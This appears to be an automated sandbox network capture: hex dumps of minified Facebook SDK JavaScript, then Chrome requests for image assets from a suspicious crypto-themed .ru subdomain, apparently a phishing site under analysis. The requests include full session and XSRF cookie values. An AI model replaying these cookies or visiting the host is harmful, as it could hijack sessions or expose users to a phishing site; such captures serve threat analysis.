                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:19 UTC349INData Raw: 66 69 6e 65 50 72 6f 70 65 72 74 79 28 7b 7d 2c 22 70 61 73 73 69 76 65 22 2c 7b 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 62 3d 21 30 7d 7d 29 3b 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 74 65 73 74 22 2c 6e 75 6c 6c 2c 63 29 7d 63 61 74 63 68 28 61 29 7b 7d 76 61 72 20 67 3d 62 3b 66 75 6e 63 74 69 6f 6e 20 61 28 61 29 7b 72 65 74 75 72 6e 20 67 3f 61 3a 74 79 70 65 6f 66 20 61 3d 3d 3d 22 62 6f 6f 6c 65 61 6e 22 3f 61 3a 61 2e 63 61 70 74 75 72 65 7c 7c 21 31 7d 66 2e 69 73 50 61 73 73 69 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 53 75 70 70 6f 72 74 65 64 3d 67 3b 66 2e 6d 61 6b 65 45 76 65 6e 74 4f 70 74 69 6f 6e 73 3d 61 7d 29 2c 36 36 29 3b 0a 5f 5f 64 28 22 44 4f 4d 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 22
                                                                                                                                                                                                                                                                                                              Data Ascii: fineProperty({},"passive",{get:function(){b=!0}});window.addEventListener("test",null,c)}catch(a){}var g=b;function a(a){return g?a:typeof a==="boolean"?a:a.capture||!1}f.isPassiveEventListenerSupported=g;f.makeEventOptions=a}),66);__d("DOMEventListener"
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:19 UTC363INData Raw: 62 2c 63 2c 64 2c 65 2c 66 2c 67 29 7b 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 62 61 62 65 6c 48 65 6c 70 65 72 73 2e 69 6e 68 65 72 69 74 73 4c 6f 6f 73 65 28 62 2c 61 29 3b 66 75 6e 63 74 69 6f 6e 20 62 28 62 2c 63 29 7b 72 65 74 75 72 6e 20 61 2e 63 61 6c 6c 28 74 68 69 73 2c 62 2c 63 29 7c 7c 74 68 69 73 7d 72 65 74 75 72 6e 20 62 7d 28 63 28 22 4d 61 6e 61 67 65 64 45 72 72 6f 72 22 29 29 3b 67 5b 22 64 65 66 61 75 6c 74 22 5d 3d 61 7d 29 2c 39 38 29 3b 0a 5f 5f 64 28 22 66 6c 61 74 74 65 6e 4f 62 6a 65 63 74 22 2c 5b 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 61 28 61 29 7b 76 61 72 20 62 3d 7b 7d 3b 66 6f 72 28 76 61 72 20 63 20 69 6e 20 61 29 69 66
                                                                                                                                                                                                                                                                                                              Data Ascii: b,c,d,e,f,g){a=function(a){babelHelpers.inheritsLoose(b,a);function b(b,c){return a.call(this,b,c)||this}return b}(c("ManagedError"));g["default"]=a}),98);__d("flattenObject",[],(function(a,b,c,d,e,f){"use strict";function a(a){var b={};for(var c in a)if
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:19 UTC379INData Raw: 61 2e 67 65 74 50 72 6f 74 6f 63 6f 6c 28 29 3f 21 30 3a 68 2e 69 6e 64 65 78 4f 66 28 61 2e 67 65 74 50 72 6f 74 6f 63 6f 6c 28 29 29 21 3d 3d 2d 31 26 26 67 2e 74 65 73 74 28 61 2e 67 65 74 44 6f 6d 61 69 6e 28 29 29 7d 61 2e 73 65 74 52 65 67 65 78 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 67 3d 61 7d 3b 66 5b 22 64 65 66 61 75 6c 74 22 5d 3d 61 7d 29 2c 36 36 29 3b 0a 5f 5f 64 28 22 69 73 49 6e 73 74 61 67 72 61 6d 55 52 49 22 2c 5b 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 76 61 72 20 67 3d 6e 75 6c 6c 3b 66 75 6e 63 74 69 6f 6e 20 61 28 61 29 7b 69 66 28 61 2e 69 73 45 6d 70 74 79 28 29 26 26 61 2e 74 6f 53 74 72 69 6e 67 28 29 21 3d 3d 22 23 22 29 72 65 74 75 72 6e 21 31 3b 69 66 28 21 61 2e 67 65 74 44 6f 6d 61 69 6e
                                                                                                                                                                                                                                                                                                              Data Ascii: a.getProtocol()?!0:h.indexOf(a.getProtocol())!==-1&&g.test(a.getDomain())}a.setRegex=function(a){g=a};f["default"]=a}),66);__d("isInstagramURI",[],(function(a,b,c,d,e,f){var g=null;function a(a){if(a.isEmpty()&&a.toString()!=="#")return!1;if(!a.getDomain
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:19 UTC395INData Raw: 6e 6f 64 65 3a 62 2c 74 79 70 65 3a 63 2c 66 62 43 61 6c 6c 49 44 3a 61 2e 69 64 2c 6d 65 74 68 6f 64 3a 61 2e 6e 61 6d 65 2c 70 61 72 61 6d 73 3a 61 2e 70 61 72 61 6d 73 7d 2c 70 2e 5f 6c 6f 61 64 65 64 4e 6f 64 65 73 5b 61 2e 69 64 5d 3d 62 7d 2c 67 65 74 4c 6f 61 64 65 64 4e 6f 64 65 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 74 79 70 65 6f 66 20 61 3d 3d 3d 22 6f 62 6a 65 63 74 22 3f 61 2e 69 64 3a 61 3b 61 3d 70 2e 5f 6c 6f 61 64 65 64 4e 6f 64 65 73 5b 61 5d 3b 72 65 74 75 72 6e 20 61 3f 61 2e 6e 6f 64 65 3a 6e 75 6c 6c 7d 2c 68 69 64 64 65 6e 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 2e 63 6c 61 73 73 4e 61 6d 65 3d 22 46 42 5f 55 49 5f 48 69 64 64 65 6e 22 2c 61 2e 72 6f 6f 74 3d 64 28 22 73 64 6b 2e 43 6f 6e 74 65 6e 74 22 29 2e 61 70 70 65 6e
                                                                                                                                                                                                                                                                                                              Data Ascii: node:b,type:c,fbCallID:a.id,method:a.name,params:a.params},p._loadedNodes[a.id]=b},getLoadedNode:function(a){a=typeof a==="object"?a.id:a;a=p._loadedNodes[a];return a?a.node:null},hidden:function(a){a.className="FB_UI_Hidden",a.root=d("sdk.Content").appen
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:19 UTC411INData Raw: 72 69 65 6e 64 73 4f 6e 6c 69 6e 65 22 29 3b 66 75 6e 63 74 69 6f 6e 20 62 28 61 2c 62 29 7b 69 66 28 61 21 3d 22 63 61 6e 76 61 73 2e 66 72 69 65 6e 64 73 4f 6e 6c 69 6e 65 55 70 64 61 74 65 64 22 29 72 65 74 75 72 6e 3b 62 2e 6c 65 6e 67 74 68 3d 3d 3d 31 26 26 63 28 22 73 64 6b 2e 52 50 43 22 29 2e 72 65 6d 6f 74 65 2e 75 73 65 46 72 69 65 6e 64 73 4f 6e 6c 69 6e 65 28 21 30 29 7d 66 75 6e 63 74 69 6f 6e 20 65 28 61 2c 62 29 7b 69 66 28 61 21 3d 22 63 61 6e 76 61 73 2e 66 72 69 65 6e 64 73 4f 6e 6c 69 6e 65 55 70 64 61 74 65 64 22 29 72 65 74 75 72 6e 3b 62 2e 6c 65 6e 67 74 68 3d 3d 3d 30 26 26 63 28 22 73 64 6b 2e 52 50 43 22 29 2e 72 65 6d 6f 74 65 2e 75 73 65 46 72 69 65 6e 64 73 4f 6e 6c 69 6e 65 28 21 31 29 7d 7d 61 3d 7b 69 6e 69 74 3a 61 2c 69
                                                                                                                                                                                                                                                                                                              Data Ascii: riendsOnline");function b(a,b){if(a!="canvas.friendsOnlineUpdated")return;b.length===1&&c("sdk.RPC").remote.useFriendsOnline(!0)}function e(a,b){if(a!="canvas.friendsOnlineUpdated")return;b.length===0&&c("sdk.RPC").remote.useFriendsOnline(!1)}}a={init:a,i
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:19 UTC413INData Raw: 61 79 3a 22 74 6f 75 63 68 22 2c 6d 65 74 68 6f 64 3a 22 67 61 6d 69 6e 67 5f 6d 65 64 69 61 5f 6c 69 62 72 61 72 79 22 2c 6d 65 64 69 61 5f 69 64 3a 62 7d 2c 66 75 6e 63 74 69 6f 6e 28 62 29 7b 65 21 3d 3d 6e 75 6c 6c 26 26 65 28 61 29 7d 29 7d 7d 29 7d 64 3d 7b 66 72 69 65 6e 64 46 69 6e 64 65 72 3a 61 2c 75 70 6c 6f 61 64 49 6d 61 67 65 54 6f 4d 65 64 69 61 4c 69 62 72 61 72 79 3a 62 7d 3b 65 3d 64 3b 67 5b 22 64 65 66 61 75 6c 74 22 5d 3d 65 7d 29 2c 39 38 29 3b 0a 5f 5f 64 28 22 73 64 6b 2e 47 61 6d 69 6e 67 53 65 72 76 69 63 65 73 2d 70 75 62 6c 69 63 22 2c 5b 22 46 42 22 2c 22 73 64 6b 2e 47 61 6d 69 6e 67 53 65 72 76 69 63 65 73 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 29 7b 22 75 73 65 20 73 74 72 69 63 74 22
                                                                                                                                                                                                                                                                                                              Data Ascii: ay:"touch",method:"gaming_media_library",media_id:b},function(b){e!==null&&e(a)})}})}d={friendFinder:a,uploadImageToMediaLibrary:b};e=d;g["default"]=e}),98);__d("sdk.GamingServices-public",["FB","sdk.GamingServices"],(function(a,b,c,d,e,f,g){"use strict"
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:19 UTC427INData Raw: 29 7d 62 2e 76 65 72 73 69 6f 6e 7c 7c 28 62 2e 76 65 72 73 69 6f 6e 3d 63 28 22 73 64 6b 2e 52 75 6e 74 69 6d 65 22 29 2e 67 65 74 56 65 72 73 69 6f 6e 28 29 29 3b 62 2e 70 65 72 6d 61 6c 69 6e 6b 7c 7c 28 62 2e 77 69 64 74 68 3d 62 2e 6d 6f 62 69 6c 65 7c 7c 62 2e 77 69 64 74 68 3d 3d 3d 22 61 75 74 6f 22 7c 7c 62 2e 77 69 64 74 68 3d 3d 3d 22 31 30 30 25 22 3f 22 22 3a 62 2e 77 69 64 74 68 3f 4d 61 74 68 2e 6d 61 78 28 62 2e 77 69 64 74 68 2c 68 29 3a 35 35 30 2c 62 2e 68 65 69 67 68 74 3d 31 30 30 29 3b 69 66 28 62 2e 68 72 65 66 21 3d 6e 75 6c 6c 29 7b 65 3d 6e 65 77 28 63 28 22 73 64 6b 2e 55 52 49 22 29 29 28 62 2e 68 72 65 66 29 3b 65 2e 67 65 74 50 72 6f 74 6f 63 6f 6c 28 29 7c 7c 28 62 2e 68 72 65 66 3d 65 2e 73 65 74 50 72 6f 74 6f 63 6f 6c 28
                                                                                                                                                                                                                                                                                                              Data Ascii: )}b.version||(b.version=c("sdk.Runtime").getVersion());b.permalink||(b.width=b.mobile||b.width==="auto"||b.width==="100%"?"":b.width?Math.max(b.width,h):550,b.height=100);if(b.href!=null){e=new(c("sdk.URI"))(b.href);e.getProtocol()||(b.href=e.setProtocol(
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:19 UTC443INData Raw: 74 69 6f 6e 46 72 61 6d 65 7c 7c 61 2e 77 65 62 6b 69 74 52 65 71 75 65 73 74 41 6e 69 6d 61 74 69 6f 6e 46 72 61 6d 65 7c 7c 61 2e 6d 6f 7a 52 65 71 75 65 73 74 41 6e 69 6d 61 74 69 6f 6e 46 72 61 6d 65 7c 7c 61 2e 6f 52 65 71 75 65 73 74 41 6e 69 6d 61 74 69 6f 6e 46 72 61 6d 65 7c 7c 61 2e 6d 73 52 65 71 75 65 73 74 41 6e 69 6d 61 74 69 6f 6e 46 72 61 6d 65 3b 63 3d 62 3b 66 5b 22 64 65 66 61 75 6c 74 22 5d 3d 63 7d 29 2c 36 36 29 3b 0a 5f 5f 64 28 22 72 65 71 75 65 73 74 41 6e 69 6d 61 74 69 6f 6e 46 72 61 6d 65 50 6f 6c 79 66 69 6c 6c 22 2c 5b 22 6e 61 74 69 76 65 52 65 71 75 65 73 74 41 6e 69 6d 61 74 69 6f 6e 46 72 61 6d 65 22 2c 22 70 65 72 66 6f 72 6d 61 6e 63 65 4e 6f 77 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c
                                                                                                                                                                                                                                                                                                              Data Ascii: tionFrame||a.webkitRequestAnimationFrame||a.mozRequestAnimationFrame||a.oRequestAnimationFrame||a.msRequestAnimationFrame;c=b;f["default"]=c}),66);__d("requestAnimationFramePolyfill",["nativeRequestAnimationFrame","performanceNow"],(function(a,b,c,d,e,f,
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:19 UTC459INData Raw: 69 70 61 64 28 29 29 26 26 45 53 28 22 4f 62 6a 65 63 74 22 2c 22 61 73 73 69 67 6e 22 2c 21 31 2c 65 2c 7b 77 69 64 74 68 3a 22 32 32 30 70 78 22 2c 6d 69 6e 57 69 64 74 68 3a 22 31 30 30 25 22 7d 29 3b 45 53 28 22 4f 62 6a 65 63 74 22 2c 22 61 73 73 69 67 6e 22 2c 21 31 2c 74 68 69 73 2e 69 66 72 61 6d 65 2e 73 74 79 6c 65 2c 65 29 7d 7d 7d 3b 65 2e 67 65 74 50 61 72 61 6d 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 61 72 61 6d 73 7d 3b 65 2e 75 70 64 61 74 65 4c 69 66 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 74 68 69 73 2e 69 66 72 61 6d 65 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 3d 3d 74 68 69 73 2e 69 66 72 61 6d 65 4f 70 74 69 6f 6e 73 2e 72 6f 6f 74 2e 73 74 79 6c 65 2e 77 69 64 74 68 26 26 74 68 69
                                                                                                                                                                                                                                                                                                              Data Ascii: ipad())&&ES("Object","assign",!1,e,{width:"220px",minWidth:"100%"});ES("Object","assign",!1,this.iframe.style,e)}}};e.getParams=function(){return this.params};e.updateLift=function(){var a=this.iframe.style.width===this.iframeOptions.root.style.width&&thi
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:19 UTC475INData Raw: 66 72 61 6d 65 29 7d 3b 65 2e 24 43 75 73 74 6f 6d 65 72 43 68 61 74 32 34 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 61 2e 73 68 6f 75 6c 64 48 69 64 65 3b 61 3d 3d 3d 22 74 72 75 65 22 3f 74 68 69 73 2e 24 43 75 73 74 6f 6d 65 72 43 68 61 74 33 31 28 74 68 69 73 2e 24 43 75 73 74 6f 6d 65 72 43 68 61 74 31 30 29 3a 74 68 69 73 2e 24 43 75 73 74 6f 6d 65 72 43 68 61 74 33 32 28 74 68 69 73 2e 24 43 75 73 74 6f 6d 65 72 43 68 61 74 31 30 29 7d 3b 65 2e 67 65 74 50 61 72 61 6d 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 7b 61 6c 6c 6f 77 5f 67 75 65 73 74 73 3a 22 62 6f 6f 6c 22 2c 61 74 74 72 69 62 75 74 69 6f 6e 3a 22 73 74 72 69 6e 67 22 2c 67 72 65 65 74 69 6e 67 5f 64 69 61 6c 6f 67 5f 64 69 73 70 6c 61 79 3a 22 73 74 72 69 6e 67 22 2c
                                                                                                                                                                                                                                                                                                              Data Ascii: frame)};e.$CustomerChat24=function(a){a=a.shouldHide;a==="true"?this.$CustomerChat31(this.$CustomerChat10):this.$CustomerChat32(this.$CustomerChat10)};e.getParams=function(){return{allow_guests:"bool",attribution:"string",greeting_dialog_display:"string",
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:19 UTC477INData Raw: 42 6f 75 6e 63 65 4f 75 74 41 6e 69 6d 61 74 69 6f 6e 28 74 68 69 73 2e 24 43 75 73 74 6f 6d 65 72 43 68 61 74 31 29 3b 65 21 3d 6e 75 6c 6c 26 26 64 28 22 73 64 6b 2e 44 4f 4d 22 29 2e 72 65 6d 6f 76 65 43 73 73 28 61 2c 65 29 3b 62 21 3d 6e 75 6c 6c 26 26 64 28 22 73 64 6b 2e 44 4f 4d 22 29 2e 61 64 64 43 73 73 28 61 2c 62 29 3b 69 66 28 63 28 22 73 64 6b 2e 55 41 22 29 2e 6d 6f 62 69 6c 65 28 29 29 64 28 22 73 64 6b 2e 44 4f 4d 22 29 2e 73 65 74 53 74 79 6c 65 28 61 2c 22 6d 61 78 48 65 69 67 68 74 22 2c 22 31 30 30 25 22 29 2c 64 28 22 73 64 6b 2e 44 4f 4d 22 29 2e 73 65 74 53 74 79 6c 65 28 61 2c 22 68 65 69 67 68 74 22 2c 22 31 30 30 25 22 29 2c 64 28 22 73 64 6b 2e 44 4f 4d 22 29 2e 73 65 74 53 74 79 6c 65 28 61 2c 22 77 69 64 74 68 22 2c 22 31 30
                                                                                                                                                                                                                                                                                                              Data Ascii: BounceOutAnimation(this.$CustomerChat1);e!=null&&d("sdk.DOM").removeCss(a,e);b!=null&&d("sdk.DOM").addCss(a,b);if(c("sdk.UA").mobile())d("sdk.DOM").setStyle(a,"maxHeight","100%"),d("sdk.DOM").setStyle(a,"height","100%"),d("sdk.DOM").setStyle(a,"width","10
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:19 UTC491INData Raw: 26 26 28 61 2e 65 32 65 3d 7b 7d 29 3b 66 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 67 21 3d 6e 75 6c 6c 26 26 64 28 22 73 64 6b 2e 58 44 22 29 2e 73 65 6e 64 54 6f 46 61 63 65 62 6f 6f 6b 28 62 2c 7b 6d 65 74 68 6f 64 3a 22 6c 6f 67 69 6e 43 6f 6d 70 6c 65 74 65 22 2c 70 61 72 61 6d 73 3a 45 53 28 22 4a 53 4f 4e 22 2c 22 73 74 72 69 6e 67 69 66 79 22 2c 21 31 2c 7b 66 72 61 6d 65 5f 6e 61 6d 65 3a 67 2e 69 64 2c 73 74 61 74 75 73 3a 63 28 22 73 64 6b 2e 52 75 6e 74 69 6d 65 22 29 2e 67 65 74 4c 6f 67 69 6e 53 74 61 74 75 73 28 29 7d 29 7d 29 2c 65 28 61 29 7d 3b 76 61 72 20 67 3d 63 28 22 73 64 6b 2e 55 49 53 65 72 76 65 72 22 29 2e 70 72 65 70 61 72 65 43 61 6c 6c 28 61 2c 66 29 3b 67 21 3d 6e 75 6c 6c 26 26 28 67 2e 64 69 6d 73 3d 7b 7d 2c 67 2e 64 69 6d
                                                                                                                                                                                                                                                                                                              Data Ascii: &&(a.e2e={});f=function(a){g!=null&&d("sdk.XD").sendToFacebook(b,{method:"loginComplete",params:ES("JSON","stringify",!1,{frame_name:g.id,status:c("sdk.Runtime").getLoginStatus()})}),e(a)};var g=c("sdk.UIServer").prepareCall(a,f);g!=null&&(g.dims={},g.dim
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:19 UTC507INData Raw: 30 5d 2c 61 5b 31 5d 29 7d 29 3b 62 28 22 73 64 6b 2e 45 76 65 6e 74 22 29 2e 73 75 62 73 63 72 69 62 65 28 22 69 6e 69 74 3a 70 6f 73 74 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 2e 78 66 62 6d 6c 26 26 77 69 6e 64 6f 77 2e 73 65 74 54 69 6d 65 6f 75 74 28 62 28 22 77 72 61 70 46 75 6e 63 74 69 6f 6e 22 29 28 45 53 28 62 28 22 73 64 6b 2e 64 6f 6d 52 65 61 64 79 22 29 2c 22 62 69 6e 64 22 2c 21 30 2c 6e 75 6c 6c 2c 62 28 22 58 46 42 4d 4c 22 29 2e 70 61 72 73 65 29 2c 22 65 6e 74 72 79 22 2c 22 69 6e 69 74 3a 70 6f 73 74 3a 78 66 62 6d 6c 2e 70 61 72 73 65 22 29 2c 30 29 7d 29 3b 74 72 79 7b 64 6f 63 75 6d 65 6e 74 2e 6e 61 6d 65 73 70 61 63 65 73 26 26 21 64 6f 63 75 6d 65 6e 74 2e 6e 61 6d 65 73 70 61 63 65 73 2e 69 74 65 6d 2e 66 62 26 26 64 6f 63
                                                                                                                                                                                                                                                                                                              Data Ascii: 0],a[1])});b("sdk.Event").subscribe("init:post",function(a){a.xfbml&&window.setTimeout(b("wrapFunction")(ES(b("sdk.domReady"),"bind",!0,null,b("XFBML").parse),"entry","init:post:xfbml.parse"),0)});try{document.namespaces&&!document.namespaces.item.fb&&doc


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              140192.168.2.1649854104.21.0.95443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:17 UTC1627OUTGET /web5/assets/key.png HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: yxmaiypmfuyt.holdbitco.ru
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: cf_clearance=LkHGzvo_IwkTO1pAwEyKBl2ahuC4yTBUkz5zskdHIa0-1698251260-0-1-77df9780.2f6afecc.20dec860-0.2.1698251260; XSRF-TOKEN=eyJpdiI6Ik5Rb09UQ1VOdjBvVHZTZ2dvY2EzcVE9PSIsInZhbHVlIjoiQXNjeTdFTlladXpTZWRlOWdXeXNOUmNyVk1IVnE0NmxlQldGWE51SDVKVk4vMHZuT0VDTTRrOFNEZlgzUC9md01BRkgxRlFvNUJ3TmhGRlJzc3Y0UVUzVG5yNlVnOUJacWMzcHBUVXhlZEd2dGc4STVqbEQ5U2V6VXpTKzFhUnoiLCJtYWMiOiIxZWQ3MjY0YjJkOWZmMzYyNzkxZWY3NWMxMDE1ZDAxNTY4ZTRmMGQ2MzQxYmUzNDNlNTVkNWE1YmM0MzFiY2MwIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InlHNnlLU3N5VVRhem1oZ3NRT3Yrbnc9PSIsInZhbHVlIjoidlFZWnM3RGRqMmo0ZmJyNFJjUnIyNTgveTJnUkozQVVFTm5VTlV5L1NacjhiVDRIQ2gzRmc4QUVNbUQ1eUxlT3prQnNuSHNvdVNMN3hBMVBZRDlWaklZeEtBQy9uK21DTzBWTTVoUHFFNlVlYlJuOW5IL0hKWlhSdjh0U3NBd1QiLCJtYWMiOiI4ZGU4NjliOGJjYTcwMjZhYzYzNTI2YzdhZTRiYTI0YmJjODliYjIwYThlNTEwODUxMzYxMzQ2MzZhNDRjNDI0IiwidGFnIjoiIn0%3D


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              141192.168.2.1649856104.21.0.95443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:17 UTC1629OUTGET /web5/assets/back.png HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: yxmaiypmfuyt.holdbitco.ru
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: cf_clearance=LkHGzvo_IwkTO1pAwEyKBl2ahuC4yTBUkz5zskdHIa0-1698251260-0-1-77df9780.2f6afecc.20dec860-0.2.1698251260; XSRF-TOKEN=eyJpdiI6Ik5Rb09UQ1VOdjBvVHZTZ2dvY2EzcVE9PSIsInZhbHVlIjoiQXNjeTdFTlladXpTZWRlOWdXeXNOUmNyVk1IVnE0NmxlQldGWE51SDVKVk4vMHZuT0VDTTRrOFNEZlgzUC9md01BRkgxRlFvNUJ3TmhGRlJzc3Y0UVUzVG5yNlVnOUJacWMzcHBUVXhlZEd2dGc4STVqbEQ5U2V6VXpTKzFhUnoiLCJtYWMiOiIxZWQ3MjY0YjJkOWZmMzYyNzkxZWY3NWMxMDE1ZDAxNTY4ZTRmMGQ2MzQxYmUzNDNlNTVkNWE1YmM0MzFiY2MwIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InlHNnlLU3N5VVRhem1oZ3NRT3Yrbnc9PSIsInZhbHVlIjoidlFZWnM3RGRqMmo0ZmJyNFJjUnIyNTgveTJnUkozQVVFTm5VTlV5L1NacjhiVDRIQ2gzRmc4QUVNbUQ1eUxlT3prQnNuSHNvdVNMN3hBMVBZRDlWaklZeEtBQy9uK21DTzBWTTVoUHFFNlVlYlJuOW5IL0hKWlhSdjh0U3NBd1QiLCJtYWMiOiI4ZGU4NjliOGJjYTcwMjZhYzYzNTI2YzdhZTRiYTI0YmJjODliYjIwYThlNTEwODUxMzYxMzQ2MzZhNDRjNDI0IiwidGFnIjoiIn0%3D


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              142104.21.0.95443192.168.2.1649841C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:17 UTC1637INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Date: Wed, 25 Oct 2023 16:29:17 GMT
                                                                                                                                                                                                                                                                                                              Content-Type: image/png
                                                                                                                                                                                                                                                                                                              Content-Length: 1400
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Last-Modified: Sun, 19 Mar 2023 15:20:17 GMT
                                                                                                                                                                                                                                                                                                              ETag: "578-5f7425905ae40"
                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                                              Content-Security-Policy: frame-ancestors 'none'
                                                                                                                                                                                                                                                                                                              Cache-Control: max-age=14400
                                                                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5F0VEhKjAoBX9hLmmjRQPpobyun5F6WUO9QR1u7ir%2B7FosMGr17AjA2o370PRms8Onbuflq1fzhYUrMMVABA2d11F76WZ5mcarz2d1KSZflvETVloXL3L4av5%2FAdrlU6hyBhSFjH99uE8mo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                              CF-Cache-Status: MISS
                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                                                                              CF-RAY: 81bbd6678b7981b5-IAD
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:17 UTC1637INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 6c 00 00 00 18 08 06 00 00 00 1f d5 18 1a 00 00 05 3f 49 44 41 54 68 43 ed 58 bd 6e 13 41 10 be 4b d2 d0 20 87 b4 48 38 bc 00 c9 13 10 37 50 c6 ee 91 70 9e 00 e7 af 26 ae f3 83 f3 04 18 89 3e 97 92 34 98 27 c0 79 81 60 24 5a c0 d0 d0 24 31 df b7 9a 39 8d 97 3b bc 91 0c 77 91 7c d2 c9 f6 7a 76 76 76 be f9 8f 7f d6 1f 8e a2 b0 e7 db dd e4 62 e9 e5 59 f4 15 e4 f7 42 b6 b4 9f 44 71 08 dd 8c 26 5c 03 f1 0c b0 70 65 95 81 72 06 58 19 50 b8 81 0c 33 c0 6e a0 ac 7f 4d da 6a b5 aa f3 f3 f3 2b a3 d1 a8 72 7d 7d 9d 74 3a 9d a1 7f 66 61 80 6d 6d 6d 35 55 18 08 d9 df df df ef e7 29 64 77 77 77 e5 ea ea 6a 85 ff c7 71 3c 3c 3c 3c 4c f8 7d 67 67 67 0d 1f eb 97 97 97 ed ac cb fd 6b 05 4f 93 3f f4 d1 c2 dd 5e 82 67
                                                                                                                                                                                                                                                                                                              Data Ascii: PNGIHDRl?IDAThCXnAK H87Pp&>4'y`$Z$19;w|zvvvbYBDq&\perXP3nMj+r}}t:fammm5U)dwwwjq<<<<L}gggkO?^g
